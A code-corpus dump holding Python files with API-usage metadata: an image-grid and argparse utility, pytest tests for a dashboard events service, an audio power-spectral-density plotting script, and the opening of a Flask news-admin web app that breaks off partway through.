{"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 140, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 150, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 157, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 158, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 173, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 304, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.vectorize", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 455, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.log1p", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 465, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 488, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 489, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 536, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 537, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 538, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 552, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 612, "usage_type": "call"}, {"api_name": "time.time", "line_number": 617, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 620, "usage_type": "call"}, {"api_name": "time.time", "line_number": 623, "usage_type": "call"}, {"api_name": "time.time", "line_number": 632, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 634, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 634, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 641, "usage_type": "call"}, {"api_name": "time.time", "line_number": 644, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 647, "usage_type": "call"}, {"api_name": "time.time", "line_number": 649, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 661, "usage_type": "call"}, {"api_name": "os.path", "line_number": 661, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 663, "usage_type": "call"}, {"api_name": "os.path", "line_number": 663, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 664, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 666, "usage_type": "call"}, {"api_name": "os.path", "line_number": 666, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 705, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 721, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 724, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.preprocessing", "line_number": 732, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing", "line_number": 732, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.preprocessing", "line_number": 733, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing", "line_number": 733, "usage_type": "name"}, {"api_name": "numpy.append", "line_number": 745, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 745, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 746, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 746, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.expm1", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.fabs", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 760, "usage_type": "call"}]} +{"seq_id": "472277305", "text": "from __future__ import division\nimport torch\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef make_numpy_grid(batch1):\n\n ncols = len(batch1) # 2 or 3\n n, c, h, w = batch1[0].size()\n\n batch1 = list(batch1)\n batch1[0] = (batch1[0][0].numpy().transpose(1, 2, 0) * 255).astype(np.uint8)\n\n # batch1[1] = (batch1[1] - batch1[1].min()) / (batch1[1].max() - batch1[1].min())\n batch1[1] = (batch1[1][0].numpy() * 255).astype(np.uint8)\n batch1[1] = np.expand_dims(batch1[1], 2)\n batch1[1] = np.repeat(batch1[1], 3, 2)\n\n if ncols > 2:\n batch1[2] = (batch1[2] - batch1[2].min()) / (batch1[2].max() - batch1[2].min())\n batch1[2] = (batch1[2][0, 1, ...].numpy() * 255).astype(np.uint8)\n batch1[2] = np.expand_dims(batch1[2], 2)\n batch1[2] = np.repeat(batch1[2], 3, 2)\n grid = np.concatenate(batch1, axis=1)\n return grid\n\n\ndef imshow_batch(batch, save_draw_path):\n grid = make_numpy_grid(batch)\n plt.title(\"Batch\")\n if not save_draw_path:\n plt.imshow(grid)\n plt.show()\n else:\n random_name = np.random.randint(0, 2 ** 10)\n plt.imsave(save_draw_path + str(random_name) + \".png\", grid)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n arg = parser.add_argument\n arg(\"--mode\", choices=[\"train\", \"predict\", \"validate\", \"visualize\"], default=\"train\")\n arg(\"--size\", type=str, default='264x176', help='Resizing output')\n arg(\"--model\", type=str)\n arg(\"--batch\", type=int, default=1)\n arg(\"--chunk\", type=int, default=-1)\n arg(\"--shuffle\", type=int, default=1)\n arg(\"--epochs\", type=int, default=10)\n arg(\"--lr\", type=float, default=1e-3)\n arg(\"--validate\", type=int, default=1)\n arg(\"--draw_every\", type=int, default=0)\n arg(\"--show\", type=int, default=0)\n arg(\"--save_draw_path\", type=str, default=None)\n arg(\"--save\", type=int, default=1)\n arg(\"--save_path\", type=str, default=\"../models\")\n arg(\"--root\", type=str, default=\"../data/\")\n args = parser.parse_args()\n return args\n\n", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2048, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.uint8", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.random.randint", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 37, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "634502649", "text": "#\n# Copyright (c) 2016 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport pytest\n\nfrom modules.constants import TapComponent as TAP, Urls\nfrom modules.markers import components, priority\nfrom modules.tap_logger import step\nfrom modules.tap_object_model import LatestEvent, Organization, Transfer, User\nfrom tests.fixtures.assertions import assert_unordered_list_equal\n\nlogged_components = (TAP.latest_events_service,)\npytestmark = [components.latest_events_service]\n\n\n@pytest.mark.usefixtures(\"add_admin_to_test_org\")\nclass TestDashboardLatestEvents:\n\n @pytest.fixture(scope=\"function\")\n def another_org(self, context):\n step(\"Create another test organization\")\n another_org = Organization.api_create(context)\n return another_org\n\n @pytest.fixture(scope=\"function\")\n def another_org_client(self, context, another_org):\n step(\"Create org manager in another org\")\n user = User.api_create_by_adding_to_organization(org_guid=another_org.guid, context=context)\n return user.login()\n\n @priority.high\n def test_10_latest_events_on_dashboard_the_same_as_in_LES(self, context, test_org):\n step(\"Produce an event in the tested organization - create a data set\")\n transfer = Transfer.api_create(context, org_guid=test_org.guid, source=Urls.test_transfer_link)\n transfer.ensure_finished()\n step(\"Retrieve latest events from dashboard\")\n dashboard_latest_events = LatestEvent.api_get_latest_events_from_org_metrics(test_org.guid)\n step(\"Retrieve latest events from the LES, filtering with tested organization\")\n latest_events_response = LatestEvent.api_get_latest_events(test_org.guid)\n step(\"Check that dashboard contains 10 latest events from LES\")\n ten_latest_events = sorted(latest_events_response, reverse=True)[:10]\n assert_unordered_list_equal(ten_latest_events, dashboard_latest_events)\n\n @priority.low\n def test_visibility_of_events(self, test_org, context, test_org_manager_client):\n events_before = LatestEvent.api_get_latest_events_from_org_metrics(test_org.guid)\n step(\"Create dataset by admin\")\n transfer = Transfer.api_create(context, org_guid=test_org.guid, source=Urls.test_transfer_link)\n transfer.ensure_finished()\n events_after = LatestEvent.api_get_latest_events_from_org_metrics(test_org.guid)\n step(\"Check admin dataset creation event is visible\")\n assert len(events_before) + 1 == len(events_after)\n step(\"Create dataset by non-admin user\")\n transfer = Transfer.api_create(context, org_guid=test_org.guid, source=Urls.test_transfer_link,\n client=test_org_manager_client)\n transfer.ensure_finished()\n events_after = LatestEvent.api_get_latest_events_from_org_metrics(test_org.guid, client=test_org_manager_client)\n step(\"Check that non-admin dataset creation event is visible\")\n assert len(events_before) + 2 == len(events_after)\n\n @priority.low\n def test_events_visibility_from_another_org(self, test_org, context, another_org, another_org_client):\n events_before = LatestEvent.api_get_latest_events_from_org_metrics(another_org.guid, client=another_org_client)\n step(\"Create dataset in another org\")\n transfer = Transfer.api_create(context, org_guid=another_org.guid, source=Urls.test_transfer_link,\n client=another_org_client)\n transfer.ensure_finished()\n step(\"Check event is on the latest events list\")\n events_after = LatestEvent.api_get_latest_events_from_org_metrics(another_org.guid, client=another_org_client)\n assert len(events_before) + 1 == len(events_after), \"The new event is not visible\"\n step(\"Check events from one org are not visible in another org\")\n test_org_events = LatestEvent.api_get_latest_events_from_org_metrics(test_org.guid)\n assert all((event not in test_org_events for event in events_after)), \\\n \"Some events from the another org are visible in first org\"\n", "sub_path": "project/tests/test_functional/dashboard/test_latest_events.py", "file_name": "test_latest_events.py", "file_ext": "py", "file_size_in_byte": 4611, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "modules.constants.TapComponent.latest_events_service", "line_number": 25, "usage_type": "attribute"}, {"api_name": "modules.constants.TapComponent", "line_number": 25, "usage_type": "name"}, {"api_name": "modules.markers.components.latest_events_service", "line_number": 26, "usage_type": "attribute"}, {"api_name": "modules.markers.components", "line_number": 26, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 34, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Organization.api_create", "line_number": 35, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Organization", "line_number": 35, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "call"}, {"api_name": "modules.tap_logger.step", "line_number": 40, "usage_type": "call"}, {"api_name": "modules.tap_object_model.User.api_create_by_adding_to_organization", "line_number": 41, "usage_type": "call"}, {"api_name": "modules.tap_object_model.User", "line_number": 41, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 38, "usage_type": "call"}, {"api_name": "modules.tap_logger.step", "line_number": 46, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer.api_create", "line_number": 47, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer", "line_number": 47, "usage_type": "name"}, {"api_name": "modules.constants.Urls.test_transfer_link", "line_number": 47, "usage_type": "attribute"}, {"api_name": "modules.constants.Urls", "line_number": 47, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 49, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 50, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 50, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 51, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events", "line_number": 52, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 52, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 53, "usage_type": "call"}, {"api_name": "tests.fixtures.assertions.assert_unordered_list_equal", "line_number": 55, "usage_type": "call"}, {"api_name": "modules.markers.priority.high", "line_number": 44, "usage_type": "attribute"}, {"api_name": "modules.markers.priority", "line_number": 44, "usage_type": "name"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 59, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 59, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 60, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer.api_create", "line_number": 61, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer", "line_number": 61, "usage_type": "name"}, {"api_name": "modules.constants.Urls.test_transfer_link", "line_number": 61, "usage_type": "attribute"}, {"api_name": "modules.constants.Urls", "line_number": 61, "usage_type": "name"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 63, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 63, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 64, "usage_type": "call"}, {"api_name": "modules.tap_logger.step", "line_number": 66, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer.api_create", "line_number": 67, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer", "line_number": 67, "usage_type": "name"}, {"api_name": "modules.constants.Urls.test_transfer_link", "line_number": 67, "usage_type": "attribute"}, {"api_name": "modules.constants.Urls", "line_number": 67, "usage_type": "name"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 70, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 70, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 71, "usage_type": "call"}, {"api_name": "modules.markers.priority.low", "line_number": 57, "usage_type": "attribute"}, {"api_name": "modules.markers.priority", "line_number": 57, "usage_type": "name"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 76, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 76, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 77, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer.api_create", "line_number": 78, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer", "line_number": 78, "usage_type": "name"}, {"api_name": "modules.constants.Urls.test_transfer_link", "line_number": 78, "usage_type": "attribute"}, {"api_name": "modules.constants.Urls", "line_number": 78, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 81, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 82, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 82, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 84, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 85, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 85, "usage_type": "name"}, {"api_name": "modules.markers.priority.low", "line_number": 74, "usage_type": "attribute"}, {"api_name": "modules.markers.priority", "line_number": 74, "usage_type": "name"}, {"api_name": "pytest.mark.usefixtures", "line_number": 29, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "262371564", "text": "#!/usr/bin/env python\n# Plot the Power Spectral Density of an Audio Source\n# Started on Thursday of January 31, 2019 by kongrawd.\n# Version of February 13, 2019: Support input of higher bitrate mono audio.\n\nimport os, sys\nfrom scipy.io import wavfile\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg') # rendering backend: macOS\nimport matplotlib.pyplot as plt\n\nfilename = 'speech/TH_th-thaiweather1_cut2.wav'\n\n# obtain path in the same folder of the script\nfrom os import path\naudio_file = path.join(os.path.abspath(os.path.dirname(sys.argv[0])), filename)\nfs, data = wavfile.read(audio_file)\n\n# subplot grid magic\nfig = plt.figure(figsize=(6, 4))\n# use matplotlib to estimate and plot the PSD\nplt.subplot(2,1,1).psd(data, NFFT=512, Fs=fs, Fc=0)\nstartPSD, endPSD = plt.subplot(2,1,1).get_xlim()\ninterval_tick = np.around(fs/20, decimals=-2)\nplt.subplot(2,1,1).set_xticks(np.arange(0, endPSD, interval_tick)) \nplt.subplot(2,1,1).set_xlabel('Frequency (Hz)')\nplt.subplot(2,1,1).set_ylabel('Relative Power (dB)')\n# input signal\nplt.subplot(2,2,3).plot(data)\nplt.subplot(2,2,3).set_title('Waveform') \nplt.subplot(2,2,3).set_xlabel('Sample')\nplt.subplot(2,2,3).set_ylabel('Amplitude')\n# spectogram\nplt.subplot(2,2,4).specgram(data, NFFT=2048, Fs=fs) \nplt.subplot(2,2,4).set_title('Spectrogram') \nplt.subplot(2,2,4).set_xlabel('Time (s)') \nplt.subplot(2,2,4).set_ylabel('Frequency (Hz)') \n\n# show plot\nplt.tight_layout()\nfig.subplots_adjust(top=0.88)\nfig.suptitle('PSD of '+filename)\n# save plot\nplt.savefig(filename+'.png', dpi=300)\nplt.show()", "sub_path": "audio2psd.py", "file_name": "audio2psd.py", "file_ext": "py", "file_size_in_byte": 1557, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.use", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "scipy.io.wavfile.read", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.around", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "383688886", "text": "# -*- coding: utf-8 -*-\n\nfrom flask import request, redirect, session ,flash ,send_from_directory\nfrom flask_login import logout_user\nfrom flask_login import login_user\nfrom flask_login import login_required\nfrom flask_login import current_user\nfrom flask_login import UserMixin\nfrom flask_login import LoginManager\nfrom flask_session import Session\nfrom flask import render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import exc , func\nfrom flask import Flask, url_for, jsonify, g\nfrom flask_ckeditor import CKEditor ,upload_success, upload_fail\nfrom flask_ckeditor import upload_success, upload_fail\nfrom werkzeug.utils import secure_filename\nfrom datetime import timedelta\n\nfrom Config import config , time_format_config\nfrom Config import allow_file_config ,list_unable_page \nfrom Config import path_Root_FileDownloadDirectory\nfrom Config import list_news_class,list_news_storagemanage_class,list_addnews_class,list_editnews_class\n\nimport codecs\nimport datetime as dtime\nimport os\nimport time\nimport shutil\n# import hashlib\n\napp = Flask(__name__,\n static_url_path='',\n static_folder='static',\n template_folder='templates')\n \n# 載入 Flask Config Setting Values,模式為 developermentConfig\napp.config.from_object(config['developermentConfig'])\n\ndb = SQLAlchemy(app)\n\n# time format settings\ntime_format = time_format_config['time_format']\ntime_format_m_id = time_format_config['time_format_m_id']\ntime_format_ckupload_img = time_format_config['time_format_ckupload_img']\n\n# print(\"time_format : {}\".format(time_format))\n# print(\"time_format_m_id : {}\".format(time_format_m_id))\n# print(\"time_format_ckupload_img : {}\".format(time_format_ckupload_img))\n\nckeditor = CKEditor()\nckeditor.init_app(app)\n\n\n# 設置上傳檔案類型控制\n# http://flask.pocoo.org/docs/1.0/patterns/fileuploads/\nALLOWED_IMAGE_EXTENSIONS = allow_file_config['ALLOWED_IMAGE_EXTENSIONS']\nALLOWED_File_EXTENSIONS = allow_file_config['ALLOWED_File_EXTENSIONS']\n# print(\"ALLOWED_IMAGE_EXTENSIONS : {}\".format(ALLOWED_IMAGE_EXTENSIONS))\n# print(\"ALLOWED_File_EXTENSIONS : {}\".format(ALLOWED_File_EXTENSIONS))\n\n''' 從Model中匯入資料表模型 '''\nfrom Model import User as User_Admin # 使用者帳戶(User)\nfrom Model import Department as DP # 科系部門(Department)\nfrom Model import News # 最新消息(News)\nfrom Model import NewsFile # 最新消息附件(NewsFile)\n\n# 設定專案預設編碼格式\ncodecs.register(lambda name: codecs.lookup(\n 'utf8') if name == 'utf8mb4' else None)\n\n# 取得當前所在位置\ncurrentPath = os.getcwd()\n# print('currentPath: ' + currentPath)\n\n\n# Flask Login Packge Config\nlogin_manager = LoginManager()\nlogin_manager.login_view = 'login' # 設置當需要登入要求時,預設轉址的頁面\nlogin_manager.init_app(app=app)\n\n\ndef get_current_datetime(): # 取得當前系統時間\n\n get_CurrentTime = dtime.datetime.now().strftime(time_format)\n\n # split_dtime = str(get_CurrentTime).split(\" \")\n\n # split_date = str(split_dtime[0]).split(\"-\") # 年 月 日\n # split_time = str(split_dtime[1]).split(\":\") # 時 分 秒\n\n split_date , split_time = get_current_splitdtime(get_CurrentTime)\n\n print(\"[get_current_datetime]Year: {} , Month: {} , Day: {}\".format(split_date[0],split_date[1],split_date[2]))\n print(\"[get_current_datetime]Hour: {} , Min: {} , Sec: {}\".format(split_time[0],split_time[1],split_time[2]))\n\n return get_CurrentTime\n\n\ndef get_current_splitdtime(dtime): # 取得分割的時間格式\n '''\n 分割時間格式為兩筆清單,分別為[年 月 日]與[時 分 秒]\n '''\n\n split_dtime = str(dtime).split(\" \")\n\n split_date = str(split_dtime[0]).split(\"-\") # 年 月 日\n split_time = str(split_dtime[1]).split(\":\") # 時 分 秒\n\n # print(\"[get_current_splitdtime]Year: {} , Month: {} , Day: {}\".format(split_date[0],split_date[1],split_date[2]))\n # print(\"[get_current_splitdtime]Hour: {} , Min: {} , Sec: {}\".format(split_time[0],split_time[1],split_time[2]))\n\n return split_date , split_time\n\n\ndef allowed_img_file(filename): # 允許的附件上傳圖片類型\n # print(\"filename.rsplit('.', 1)[1].lower(): {}\".format(filename.rsplit('.', 1)[1].lower()))\n return '.' in filename and \\\n str(filename.rsplit('.', 1)[1].lower()) in ALLOWED_IMAGE_EXTENSIONS\n\ndef allowed_file_file(filename): # 允許的附件上傳檔案類型\n # print(\"filename.rsplit('.', 1)[1].lower(): {}\".format(filename.rsplit('.', 1)[1].lower()))\n return '.' in filename and \\\n str(filename.rsplit('.', 1)[1].lower()) in ALLOWED_File_EXTENSIONS\n\n\ndef check_unable_page(get_page): # 驗證該網站頁面是否開放\n\n is_Unable = False\n\n if get_page in list_unable_page:\n\n is_Unable = True\n\n print(\"[check_unable_page]該網站[{}]目前不開放.\".format(get_page))\n\n else:\n\n is_Unable = False\n\n print(\"[check_unable_page]該網站[{}]目前開放.\".format(get_page))\n \n return is_Unable\n\n\ndef initialize_URL(): # 初始化URL參數\n\n list_URL = dict()\n\n list_URL['Home'] = url_for(\n 'admin', UID=session['UID'], UserName=session['UserName'])\n\n list_URL['news'] = url_for(\n 'news', UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=\"ALL\")\n\n list_URL['news_storagemanage'] = url_for(\n 'news_storagemanage', UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=\"ALL\")\n \n list_URL['editnews'] = url_for(\n 'editnews', UID=session['UID'], UserName=session['UserName'])\n \n list_URL['addnews'] = url_for(\n 'addnews', UID=session['UID'], UserName=session['UserName'])\n\n list_URL['logout'] = url_for('logout') \n\n return list_URL\n\n\ndef initialize_session(): # 初始化Session參數\n \n session.clear() # 清空所有Session\n\n\ndef verify_login_status(): # 驗證是否為登入核准狀態\n\n print(\"[verify_login_status]: verify time: {}\".format(get_current_datetime()))\n print(\"[verify_login_status]: session['UID']: {}\".format(session['UID']))\n print(\"[verify_login_status]: request.args.get('UID'): {}\".format(request.args.get('UID')))\n # print(\"session['UID']: {}\".format(session['UID']))\n print(\"[verify_login_status]: session['UserName']: {}\".format(session['UserName']))\n print(\"[verify_login_status]: request.args.get('UserName'): {}\".format(request.args.get('UserName')))\n # print(\"session['UserName']: {}\".format(session['UserName']))\n\n # 判斷URL是否沒有user參數 或 網頁參數user跟session不一致\n if (request.args.get('UID') is None or request.args.get('UID') != str(session['UID'])) or (request.args.get('UserName') is None or request.args.get('UserName') != session['UserName']):\n\n print(\"[verify_login_status]: 驗證到登入狀態異常.\")\n\n # 初始化Session參數\n initialize_session()\n\n if session['user_id'] != None:\n logout_user()\n\n return redirect(url_for('login'))\n\n\n@app.errorhandler(404)\ndef page_not_found(e): # 404 Not Foun頁面\n return render_template('NotFound404.html'), 404\n\n\n@app.route('/get_news_datatable', methods=['GET', 'POST'])\n@login_required\ndef get_news_datatable(): # 公告資訊Datatables呼叫請求資料\n\n # 驗證登入狀態是否異常\n verify_login_status()\n # ------------------------------------- 網頁初始化參數 ----------------------------------------------------\n\n # 取得網頁URL位址參數\n get_web_arg_DPID = request.args.get('DPID')\n get_web_arg_Class = request.args.get('Class')\n\n # print(\"[get_news_datatable]: get_web_arg_DPID: {}\".format(get_web_arg_DPID))\n # print(\"[get_news_datatable]: get_web_arg_Class: {}\".format(get_web_arg_Class)) \n\n # Datatables Server-side processing\n # https://datatables.net/manual/server-side#Returned-data\n # 取得當前datatables透過Ajax回傳的計數,用來做後端回傳資料驗證\n get_datatables_verifyCounter = request.form.get('draw')\n # 取得當前datatables透過Ajax回傳的頁面顯示筆數,用來做取查詢結果取出資料筆數\n get_showDataLength = request.form.get('length')\n # 